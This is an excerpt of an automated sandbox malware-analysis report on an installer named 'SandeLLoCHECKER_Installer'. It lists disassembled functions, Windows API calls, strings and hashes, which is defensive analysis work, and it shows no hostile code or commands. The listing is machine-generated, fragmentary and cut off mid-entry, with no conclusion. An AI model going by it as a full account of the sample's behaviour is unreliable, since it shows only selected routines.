                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2445 988f10-988f4c 2446 988f58-988f66 call 992d90 2445->2446 2447 988f4e-988f53 call 84a5a0 2445->2447 2451 988f6c-988f77 2446->2451 2452 989052-989054 2446->2452 2447->2446 2455 988f79-988f91 call 960af0 2451->2455 2456 988fa7-988fae 2451->2456 2453 989078-989081 2452->2453 2454 989056 2452->2454 2459 989194-9891a7 2453->2459 2460 989087-98908e call 84abe0 2453->2460 2457 989058-98905a 2454->2457 2458 98905c-989069 call 960f20 2454->2458 2471 988f93 2455->2471 2472 988f96-988fa1 2455->2472 2462 989039-98904f 2456->2462 2463 988fb4-988fbb call 84abe0 2456->2463 2457->2453 2457->2458 2469 98906e-989076 2458->2469 2473 9891aa-9891b4 call 84a8a0 2460->2473 2475 989094-989101 call 849c00 CreateFileW call 95eab0 2460->2475 2463->2473 2474 988fc1-988fe8 call 861a20 2463->2474 2469->2460 2471->2472 2472->2452 2472->2456 2485 989009-98902f call 994490 2474->2485 2486 988fea-988fef 2474->2486 2491 98911f-98912a 2475->2491 2492 989103 2475->2492 2485->2462 2499 989031-989034 2485->2499 2489 988ff0-988ff9 2486->2489 2489->2489 2493 988ffb-989004 call 861a20 2489->2493 2497 98912d-989154 SetFilePointer SetEndOfFile 2491->2497 2495 98910d-98911d 2492->2495 2496 989105-98910b 2492->2496 2493->2485 2495->2497 2496->2491 2496->2495 2500 989164-989179 2497->2500 2501 989156-98915d CloseHandle 2497->2501 2499->2462 2502 98917b-98917e 2500->2502 2503 989183-98918e 2500->2503 2501->2500 2502->2503 2503->2459 2503->2460
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,00000000,?,?,C7BA013E), ref: 009890D6
                                                                                                                        • SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 00989135
                                                                                                                        • SetEndOfFile.KERNEL32(?), ref: 0098913E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00989157
                                                                                                                        Strings
                                                                                                                        • Not enough disk space to extract file:, xrefs: 00988FDA
                                                                                                                        • %sholder%d.aiph, xrefs: 009890B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandlePointer
                                                                                                                        • String ID: %sholder%d.aiph$Not enough disk space to extract file:
                                                                                                                        • API String ID: 22866420-929304071
                                                                                                                        • Opcode ID: 138869a08d704254e3cae4dcb9edfbc4f82a065322206ab023fb02a6bd29091a
                                                                                                                        • Instruction ID: c52c8c66b9e38bc5be5d26766ee5c1c446d3871c5b6db2aba4b2364cdc880858
                                                                                                                        • Opcode Fuzzy Hash: 138869a08d704254e3cae4dcb9edfbc4f82a065322206ab023fb02a6bd29091a
                                                                                                                        • Instruction Fuzzy Hash: C0819175A042099FDB10EF68CC49BAEB7B9FF49324F184629F915E7391DB719900CB90
                                                                                                                        Function 009A4780 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2504 9a4780-9a47cb call 95c080 2507 9a47cd-9a47d2 2504->2507 2508 9a47d7-9a47e5 2504->2508 2509 9a4981-9a49ab call a16458 2507->2509 2510 9a47f0-9a4811 2508->2510 2512 9a481b-9a4832 SetFilePointer 2510->2512 2513 9a4813-9a4819 2510->2513 2515 9a4842-9a4857 ReadFile 2512->2515 2516 9a4834-9a483c GetLastError 2512->2516 2513->2512 2517 9a497c 2515->2517 2518 9a485d-9a4864 2515->2518 2516->2515 2516->2517 2517->2509 2518->2517 2519 9a486a-9a487b 2518->2519 2519->2510 2520 9a4881-9a488d 2519->2520 2521 9a4890-9a4894 2520->2521 2522 9a48a1-9a48a5 2521->2522 2523 9a4896-9a489f 2521->2523 2524 9a48c8-9a48ca 2522->2524 2525 9a48a7-9a48ad 2522->2525 2523->2521 2523->2522 2527 9a48cd-9a48cf 2524->2527 2525->2524 2526 9a48af-9a48b2 2525->2526 2528 9a48c4-9a48c6 2526->2528 2529 9a48b4-9a48ba 2526->2529 2530 9a48d1-9a48d4 2527->2530 2531 9a48e4-9a48e6 2527->2531 2528->2527 2529->2524 2532 9a48bc-9a48c2 2529->2532 2530->2520 2533 9a48d6-9a48df 2530->2533 2534 9a48e8-9a48f1 2531->2534 2535 9a48f6-9a491c SetFilePointer 2531->2535 2532->2524 2532->2528 2533->2510 2534->2510 2535->2517 2536 9a491e-9a4933 ReadFile 2535->2536 2536->2517 2537 9a4935-9a4939 2536->2537 2537->2517 2538 9a493b-9a4945 2537->2538 2539 9a495f-9a4964 2538->2539 2540 9a4947-9a494d 2538->2540 2539->2509 2540->2539 2541 9a494f-9a4957 2540->2541 2541->2539 2542 9a4959-9a495d 2541->2542 2542->2539 2543 9a4966-9a497a 2542->2543 2543->2509
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNEL32(00A8CA8D,-00000400,?,00000002,00000400,C7BA013E,?,?,?), ref: 009A4826
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 009A4834
                                                                                                                        • ReadFile.KERNEL32(00A8CA8D,00000000,00000400,?,00000000,?,?), ref: 009A484F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorLastPointerRead
                                                                                                                        • String ID: ADVINSTSFX
                                                                                                                        • API String ID: 64821003-4038163286
                                                                                                                        • Opcode ID: 899610e73e42f787d2ab07c3a15d0bcb142b07a75c60fd8e375b197791371521
                                                                                                                        • Instruction ID: 8612dba6167097e569c2a27a7744bdf2c688856f69114a83cfc8f9df19c17483
                                                                                                                        • Opcode Fuzzy Hash: 899610e73e42f787d2ab07c3a15d0bcb142b07a75c60fd8e375b197791371521
                                                                                                                        • Instruction Fuzzy Hash: 3461B371A002499FDB00CFA8D880BBFBBB9FB86724F244665E515A7281D7789D45CBE0
                                                                                                                        Function 009822E0 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00982300
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00982316
                                                                                                                        • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,0098AB7A,?,?,?,?,?,?), ref: 0098232F
                                                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0098AB7A,?,?), ref: 0098233A
                                                                                                                        • GetDlgItem.USER32(00000000,000003E9), ref: 0098234C
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00982362
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,0098AB7A), ref: 009823A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect$Item$InvalidateShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2147159307-0
                                                                                                                        • Opcode ID: 5cfe8a79f7f060859f91e3f5c3dd462e6b4bd9bda7f882994b5240f7efa98b51
                                                                                                                        • Instruction ID: 1300c9deac49a6b0ba6810807c171586be17cf4a906cbda263a7e09d6cb78f52
                                                                                                                        • Opcode Fuzzy Hash: 5cfe8a79f7f060859f91e3f5c3dd462e6b4bd9bda7f882994b5240f7efa98b51
                                                                                                                        • Instruction Fuzzy Hash: 6F216B71604301AFD310DF38DC49A6B7BE9EF8D704F008629F859D7291EB70E9428B92
                                                                                                                        Function 00998500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF), ref: 0099850D
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF,?), ref: 0099852E
                                                                                                                        • InternetOpenW.WININET(AdvancedInstaller,00000003,00000000,00000000,10000000), ref: 0099857B
                                                                                                                        • GetLastError.KERNEL32(?,C7BA013E,?,?,?,?,00A89C55,000000FF,?,00995E0D,?,?,00000000,?,?), ref: 0099858E
                                                                                                                        • InternetSetStatusCallbackW.WININET(00000000,009985B0), ref: 0099859D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventInternet$CallbackErrorLastOpenStatus
                                                                                                                        • String ID: AdvancedInstaller
                                                                                                                        • API String ID: 2592705480-1372594473
                                                                                                                        • Opcode ID: 36b491934217a997c4d2a1b6f2ba34f3b14e037a09b857c788b0bfee9fc70d84
                                                                                                                        • Instruction ID: efc5ef67a9e45b6d8395208c159ebd8f75764ba360e9745db79ef893ffd59720
                                                                                                                        • Opcode Fuzzy Hash: 36b491934217a997c4d2a1b6f2ba34f3b14e037a09b857c788b0bfee9fc70d84
                                                                                                                        • Instruction Fuzzy Hash: BC114971340602BFEB20CB39CC8AF26BBA8FB84705F214429F505DB290DB71E856CB91
                                                                                                                        Function 009A59C0 Relevance: 9.3, APIs: 6, Instructions: 308synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,C7BA013E,?,00000000,?,?,?,?,?,?,00000000,00A8CE1D,000000FF), ref: 009A5A00
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,009A5D70,?,00000000,?), ref: 009A5A36
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009A5B40
                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 009A5B4B
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 009A5B6B
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E,?,?,?), ref: 009A5BD4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateObjectSingleThreadWait$AllocateCloseCodeEventExitHandleHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3066744267-0
                                                                                                                        • Opcode ID: e99693afe051ea1eddd6ff23c2b44ef7ba5dfefb1bb921c3cfb9c6c5611d0a6d
                                                                                                                        • Instruction ID: 9817d6b992f644dd7b266cfa0e86bd557f2a5a8ab89d2edd8f2158851adf619e
                                                                                                                        • Opcode Fuzzy Hash: e99693afe051ea1eddd6ff23c2b44ef7ba5dfefb1bb921c3cfb9c6c5611d0a6d
                                                                                                                        • Instruction Fuzzy Hash: 35C13975B006159FCB14CF68C984BAEBBF5FF49710F2586A9E815AB391D730E901CBA0
                                                                                                                        Function 00960F20 Relevance: 9.2, APIs: 6, Instructions: 234COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PathIsUNCW.SHLWAPI(?,C7BA013E,?,?,?,?,?,?,00A7F415,000000FF,?,009855E4,?,?,?), ref: 00960F6B
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00ABAD74,00000001,?), ref: 0096102A
                                                                                                                        • GetLastError.KERNEL32 ref: 00961038
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLastPath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 953296794-0
                                                                                                                        • Opcode ID: 621e91f269bf825d529f4661db3226fb5f02b1deab9d931adfb5491c65a4ee45
                                                                                                                        • Instruction ID: 71a9f594eb56c45f3cd405d1d119a5bab9917450571b7e524e29129fa4b6213f
                                                                                                                        • Opcode Fuzzy Hash: 621e91f269bf825d529f4661db3226fb5f02b1deab9d931adfb5491c65a4ee45
                                                                                                                        • Instruction Fuzzy Hash: 3281C131A042099FDB10DFA8C885B9EBBB8FF55320F284269E925E72D1DB749905CB91
                                                                                                                        Function 0098AD60 Relevance: 9.1, APIs: 6, Instructions: 69threadsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,009A6800,00AC7444,00000000,?), ref: 0098ADDD
                                                                                                                        • GetLastError.KERNEL32 ref: 0098ADEA
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 0098AE13
                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 0098AE2D
                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0098AE45
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0098AE4E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1566822279-0
                                                                                                                        • Opcode ID: efdc0b99bf793979a368c941a2ec3a0b24f71fe13501d662e29785d2b49f70b2
                                                                                                                        • Instruction ID: 273516deff742e3aaf1ae33314607e15a9725f0c352e4763f3f68e884b9d0d7b
                                                                                                                        • Opcode Fuzzy Hash: efdc0b99bf793979a368c941a2ec3a0b24f71fe13501d662e29785d2b49f70b2
                                                                                                                        • Instruction Fuzzy Hash: 6631B975900209AFDF10DF94CD09BDEBBB8FB08714F104629E825A62D1DB799A05CFA5
                                                                                                                        Function 0096B0A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 196COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(80004005,00A87685,C7BA013E,?,?,00000000,?,?,00000000,00A87685,000000FF,?,80004005,C7BA013E,?), ref: 0096B105
                                                                                                                        • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,00A87685,000000FF,?,80004005,C7BA013E,?), ref: 0096B153
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInfoVersion$Size
                                                                                                                        • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                                        • API String ID: 2104008232-2149928195
                                                                                                                        • Opcode ID: a3f85c356423b9cfc1f6f5673f7695f83e340acbfeaf9bb5ea0b2337e6c87f85
                                                                                                                        • Instruction ID: 1f0b506e118486fd2959a229af6d0ab7448fdae36a21f1f1d669aa419d32dd91
                                                                                                                        • Opcode Fuzzy Hash: a3f85c356423b9cfc1f6f5673f7695f83e340acbfeaf9bb5ea0b2337e6c87f85
                                                                                                                        • Instruction Fuzzy Hash: 4761DE71901209EFDB14DFA8C959AAFB7F8FF15314F148129E821E7291EB309D44CBA1
                                                                                                                        Function 0096AF90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0096AA80: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,C7BA013E,00000000,00000000,?), ref: 0096AADB
                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,C7BA013E,00000000,?,?,00000000,00A80B25,000000FF,Shlwapi.dll,0096AF46,?,?,?), ref: 0096AFDD
                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 0096B009
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0096B04E
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0096B061
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
                                                                                                                        • String ID: Shlwapi.dll
                                                                                                                        • API String ID: 2825328469-1687636465
                                                                                                                        • Opcode ID: 7ae8b63708b76b46128e1c1fc01c0b4f7dbe6180a0d8fbf093e8b80aebd1e1aa
                                                                                                                        • Instruction ID: 8dac2b196c6a58ebea82b8b924607c8b6bd19e9a19df5c0114a2c44c8abc780c
                                                                                                                        • Opcode Fuzzy Hash: 7ae8b63708b76b46128e1c1fc01c0b4f7dbe6180a0d8fbf093e8b80aebd1e1aa
                                                                                                                        • Instruction Fuzzy Hash: 49315CB1901209EFDB11DFA5C985BEFBBBCEF08310F14412AE815E3291EB359944CBA1
                                                                                                                        Function 00963D30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(ComCtl32.dll,C7BA013E,?,00000000,00000000), ref: 00963D6E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00963D91
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00963E0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                        • API String ID: 145871493-764666640
                                                                                                                        • Opcode ID: da989f7c99201169aea7dcce93212d3dd588925af5ce78ef14ed5107ce7a783c
                                                                                                                        • Instruction ID: 89c6ed8934fcab02dd0fe526777095c705831cc6155e8304d64724d1fa7c33ec
                                                                                                                        • Opcode Fuzzy Hash: da989f7c99201169aea7dcce93212d3dd588925af5ce78ef14ed5107ce7a783c
                                                                                                                        • Instruction Fuzzy Hash: 34314FB1A00259ABDF14CF95CC55BAFBBF8EB48754F10412AF915E7281DB758A048B90
                                                                                                                        Function 0085969B Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 008596B0
                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 008596C5
                                                                                                                        • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 008596DB
                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 008596F5
                                                                                                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 00859705
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
